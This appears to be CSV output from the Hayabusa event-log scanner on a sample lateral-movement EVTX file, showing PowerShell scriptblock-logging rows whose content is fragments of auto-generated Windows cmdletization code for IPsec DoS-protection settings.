[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 